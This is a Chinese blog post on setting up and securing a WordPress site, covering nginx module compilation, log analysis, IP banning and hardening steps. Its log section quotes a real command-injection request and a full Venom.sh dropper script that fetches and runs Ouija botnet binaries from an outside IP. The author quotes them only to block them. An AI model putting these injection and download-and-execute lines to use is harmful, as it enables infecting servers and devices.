好物优选点击查看详情 京东购买

暂无内容

WordPress 建站 及安全防护

安装程序,花不少时间找模版。英文的模版感觉都不大符合中文站。找了一些中文模版,博客一号,justnews 感觉样式不错,就是要付费。 开始先省钱吧,后来找到一个不错的免费模版: frontopen2。

————————–

想在顶部 logo区域显示大幅图片广告,找了几个插件:

Head and Footer Scripts Inserter: 在 <head> 后面 <foot> 标签 插入 javascript、css 代码。 如果插入 js 广告代码,会靠左显示,不能控制位置。

Ad Inserter,adrotate,post layout 都不能 控制位置。 懒得折腾了,直接修改模版的 head.php 文件。

————————–

考虑以后要建立多个站,想统一管理流量情况。 写了个程序,在服务器运行,每小时把 nginx 日志,上传到 log管理网站,分析提取后,存入数据库。但是发现 $http_accept_language 是空值,baidu后了解,需要给nginx添加一个模块,才能获取这个值。

wget https://github.com/giom/nginx_accept_language_module/archive/master.zip ./configure --user=www --group=www --prefix=/usr/local/nginx --with-http_stub_status_module --with-http_ssl_module --with-http_v2_module --with-http_gzip_static_module --with-http_sub_module --with-stream --with-stream_ssl_module --with-openssl=/root/openssl-1.1.1d "--with-ld-opt='-ljemalloc'" --add-module=/root/nginx_accept_language_module-master

log网站,每5分钟扫描一次,看是否有新的日志文件。查看日志的时候,发现不少入侵信息:

/login.cgi?cli=aa%20aa%27;wget%20http://185.132.53.xxx/Venom.sh%20-O%20-%3E%20/tmp/kh;Venom.sh%20/tmp/kh%27$

Venom.sh 的内容是这样的

#!/bin/bash cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.132.53.xxx/Ouija_M.ips; chmod +x Ouija_M.ips; ./Ouija_M.ips; rm -rf Ouija_M.ips cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.132.53.xxx/Ouija_M.psl; chmod +x Ouija_M.psl; ./Ouija_M.psl; rm -rf Ouija_M.psl cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.132.53.xxx/Ouija_S.h4; chmod +x Ouija_S.h4; ./Ouija_S.h4; rm -rf Ouija_S.h4 cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.132.53.xxx/Ouija_x.86; chmod +x Ouija_x.86; ./Ouija_x.86; rm -rf Ouija_x.86 cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.132.53.xxx/Ouija_A.rm6; chmod +x Ouija_A.rm6; ./Ouija_A.rm6; rm -rf Ouija_A.rm6 cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.132.53.xxx/Ouija_x.32; chmod +x Ouija_x.32; ./Ouija_x.32; rm -rf Ouija_x.32 cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.132.53.xxx/Ouija_P.pc; chmod +x Ouija_P.pc; ./Ouija_P.pc; rm -rf Ouija_P.pc cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.132.53.xxx/Ouija_I.586; chmod +x Ouija_I.586; ./Ouija_I.586; rm -rf Ouija_I.586 cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.132.53.xxx/Ouija_M.68k; chmod +x Ouija_M.68k; ./Ouija_M.68k; rm -rf Ouija_M.68k cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.132.53.xxx/Ouija_P.pc; chmod +x Ouija_P.pc; ./Ouija_P.pc; rm -rf Ouija_P.pc cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.132.53.xxx/Ouija_A.rm4; chmod +x Ouija_A.rm4; ./Ouija_A.rm4; rm -rf Ouija_A.rm4 cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.132.53.xxx/Ouija_A.rm5; chmod +x Ouija_A.rm5; ./Ouija_A.rm5; rm -rf Ouija_A.rm5 

下载一个文件,发现是编译好的 bin文件,没能力研究,先封禁这个IP:

iptables -I INPUT -s 185.132.53.xxx -j DROP

————————–

又发现大量来自同一个IP的 404式的暴力漏洞扫描,搜索资料,不少利用 fail2ban 来实现,感觉不是太精细。找到一个

https://blog.51cto.com/joeyang/1878862

把他的 bash代码改成了php,每分钟执行一次,发现前一分钟有20次404的同一个IP,就封掉。

————————–

安全加固:

1) 修改 ssh 端口;改成只允许 ssh key登录

2) 把 phpmyadmin 改成非常规名字,避免被暴力扫描到

3)每天用程序扫描 www目录下所有文件的 md5,上传到 log管理服务器,log端程序分析文件变动情况、新增文件是否合理。

————————–

后续遇到问题:

1、posts 表大量 revisions 类型记录。

wp-config.php 添加: define('WP_POST_REVISIONS', false); define('AUTOSAVE_INTERVAL', 86400); 

2、内容被自动插入了 <p> <br>

在主题的functions.php 末尾加入如下代码: remove_filter ('the_content', 'wpautop');

原文链接:https://blog.csdn.net/gold2008/article/details/103676534?ops_request_misc=&request_id=b6143a7f01d1440f932e0b28f8d8723b&biz_id=&utm_medium=distribute.pc_search_result.none-task-blog-2~blog~koosearch~default-13-103676534-null-null.268%5Ev1%5Econtrol&utm_term=docker%E3%80%81wordpress%E3%80%81wordpress%E5%BB%BA%E7%AB%99%E3%80%81wordpress%E4%B8%BB%E9%A2%98%E3%80%81%E5%AE%B9%E5%99%A8%E9%95%9C%E5%83%8F%E3%80%81

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享